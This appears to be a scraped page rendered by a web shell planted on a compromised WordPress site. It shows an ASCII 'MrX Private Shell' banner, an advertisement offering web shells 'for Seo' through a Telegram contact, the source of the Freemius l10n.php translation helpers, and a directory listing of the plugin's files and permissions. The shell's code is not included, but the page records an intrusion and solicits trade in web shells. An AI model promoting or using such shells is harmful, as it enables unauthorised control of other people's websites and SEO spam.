__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Freemius
* @copyright Copyright (c) 2015, Freemius, Inc.
* @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
* @since 1.2.1.6
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
/**
* Retrieve the translation of $text.
*
* @since 1.2.1.6
*
* @param string $text
*
* @return string
*/
function _fs_text( $text ) {
// Avoid misleading Theme Check warning.
$fn = 'translate';
return $fn( $text, 'freemius' );
}
/**
* Retrieve translated string with gettext context.
*
* Quite a few times, there will be collisions with similar translatable text
* found in more than two places, but with different translated context.
*
* By including the context in the pot file, translators can translate the two
* strings differently.
*
* @since 1.2.1.6
*
* @param string $text
* @param string $context
*
* @return string
*/
function _fs_x( $text, $context ) {
// Avoid misleading Theme Check warning.
$fn = 'translate_with_gettext_context';
return $fn( $text, $context, 'freemius' );
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| customizer | Folder | 0775 |
|
|
| debug | Folder | 0775 |
|
|
| entities | Folder | 0775 |
|
|
| managers | Folder | 0775 |
|
|
| sdk | Folder | 0775 |
|
|
| supplements | Folder | 0775 |
|
|
| class-freemius-abstract.php | File | 11.99 KB | 0775 |
|
| class-freemius.php | File | 965.17 KB | 0775 |
|
| class-fs-admin-notices.php | File | 11.62 KB | 0775 |
|
| class-fs-api.php | File | 21.36 KB | 0775 |
|
| class-fs-garbage-collector.php | File | 15.96 KB | 0775 |
|
| class-fs-lock.php | File | 2.79 KB | 0775 |
|
| class-fs-logger.php | File | 17.53 KB | 0775 |
|
| class-fs-options.php | File | 16.15 KB | 0775 |
|
| class-fs-plugin-updater.php | File | 62.48 KB | 0775 |
|
| class-fs-security.php | File | 2.17 KB | 0775 |
|
| class-fs-storage.php | File | 22.23 KB | 0775 |
|
| class-fs-user-lock.php | File | 2.27 KB | 0775 |
|
| fs-core-functions.php | File | 51.08 KB | 0775 |
|
| fs-essential-functions.php | File | 14.54 KB | 0775 |
|
| fs-html-escaping-functions.php | File | 4.07 KB | 0775 |
|
| fs-plugin-info-dialog.php | File | 80.29 KB | 0775 |
|
| index.php | File | 87 B | 0775 |
|
| l10n.php | File | 1.09 KB | 0775 |
|